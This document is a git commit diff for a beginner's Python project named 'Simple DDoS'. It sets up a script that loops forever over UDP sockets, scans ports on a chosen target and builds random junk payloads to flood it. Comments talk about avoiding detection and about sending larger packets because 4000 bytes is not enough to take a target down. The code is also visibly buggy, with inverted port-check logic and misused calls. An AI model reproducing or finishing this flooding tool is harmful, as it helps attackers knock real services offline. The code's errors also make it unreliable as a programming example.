Finish script, needs refactored but runs

This commit is contained in:
Tiffany 2023-11-15 19:53:00 -05:00
parent 9ece63b941
commit 2ded4f6972
3 changed files with 72 additions and 55 deletions

5
__init__.py Normal file
View file

@ -0,0 +1,5 @@
"""Top-level package for Simple DDoS."""
# simple_ddos/__init__.py
__app_name__ = 'simple_ddos'
__version__ = "0.1.0"

19
main.py
View file

@ -1,19 +0,0 @@
#!/usr/bin/python
import argparse
from src import ddos
def main():
parser = argparse.ArgumentParser(description="DDoS Proof of concept")
parser.add_argument('-t', '--target', help="Attack target IP address")
parser.add_argument('-p', '--port', help="Port to attack")
parser.add_argument('-i', '--ipaddress', help="Fake ip address")
args = parser.parse_args(ddos)
if __name__ == "__main__":
main()

View file

@ -1,9 +1,8 @@
import os, sys, socket import sys, socket
import platform
import random import random
from datetime import datetime as dt from datetime import datetime as dt
os.system('figlet Simple DDoS | lolcat') # os.system('figlet Simple DDoS | lolcat')
# TODO: Read docs on time, os, random, threading, and platform # TODO: Read docs on time, os, random, threading, and platform
# TODO: Take questions to Mastodon # TODO: Take questions to Mastodon
@ -20,7 +19,7 @@ W = '\033[0m'
# v1: just create ddos script # v1: just create ddos script
# Instead ofusing SOCK_STREAM for TCP connections # Instead of using SOCK_STREAM for TCP connections
# using SOCK_DGRAM for UDP connections to keep packets small # using SOCK_DGRAM for UDP connections to keep packets small
# If iterating on this, will use SOCK_STREAM to send bigger packets if I actually understand # If iterating on this, will use SOCK_STREAM to send bigger packets if I actually understand
# what that means for the network being hit # what that means for the network being hit
@ -38,15 +37,15 @@ W = '\033[0m'
def ddos(target, port): def ddos(target, port):
sent = 0 sent = 0
if len(sys.argv) == 3: if len(sys.argv) != 3:
socket.gethostbyname(sys.argv[1]) # create string from IPv4 to pass as argument to sentto
else:
print('\n' + R + '[!]' + R + 'Invalid amount of arguments') print('\n' + R + '[!]' + R + 'Invalid amount of arguments')
print('\n' + 'Syntax: python3 ddos.py <ip> <port>') print('\n' + 'Syntax: python3 ddos.py <ip> <port>')
print("-" * 25) print("-" * 25)
print("Attacking target:" + target) print(f"Attacking target:{target} on {port}")
print("Time started:" + str(dt.now())) print("Time started:" + str(dt.now()))
else:
socket.gethostbyname(sys.argv[1])
try: try:
# create an infinite loop to continuously send junk data # create an infinite loop to continuously send junk data
@ -54,11 +53,42 @@ def ddos(target, port):
while True: while True:
# Create a new socket # Create a new socket
# assign socket to s # assign socket to s
# Iterate over ports to find the open ones on
# common DNS protocol ports
for port in range(0,445):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Set the timeout for 5 seconds
# I changed it from 5 seconds to 1
# because each iteration over a port should not
# take more than 1 second
# If it did, perhaps it would be detected
# quickly and shutdown
socket.setdefaulttimeout(1)
# Connect to target and port
# using connect_ex to raise an
# exception instead of just s.connect
# Assign the connection a variable res
res = s.connect_ex((target, port))
if res != 1:
pass
# Check open ports by
#
else:
print(f"Port {port} is open on {target}")
print("Connected")
# create a variable that will send 4000 random bytes # create a variable that will send 4000 random bytes
bytes1 = random.randbytes(4000) # 4000 bytes is not enough to DDoS a target.
# Will need to test with more.
bytes1: bytes = random.randbytes(4000)
# bytes2 = random.randbytes(4000) # bytes2 = random.randbytes(4000)
# system = platform.uname().system # system = platform.uname().system
@ -69,13 +99,14 @@ def ddos(target, port):
# Break out of infinite loop # Break out of infinite loop
except KeyboardInterrupt: except KeyboardInterrupt:
print('\n' + R + '[!]' + C + 'Keyboard Interrupt. Terminating session...' + W) print('\n' + R + '[!]' + C + 'Terminating Session...' + W)
sys.exit()
except socket.gaierror: except socket.gaierror:
print(R + '[-] ' + C + 'Unknown address.') print(R + '[-] ' + C + 'Unknown address.')
print(R + '[-] ' + C + 'Please input the correct ip address.') print(R + '[-] ' + C + 'Please input the correct ip address.')
sys.exit()
except NameError: except socket.error:
print(R + '[-] ' + C + 'Unknown address.') print(R + '[-] ' + C + "Couldn't connect to server.")
print(R + '[-] ' + C + 'Please input the correct ip address.') socket.close()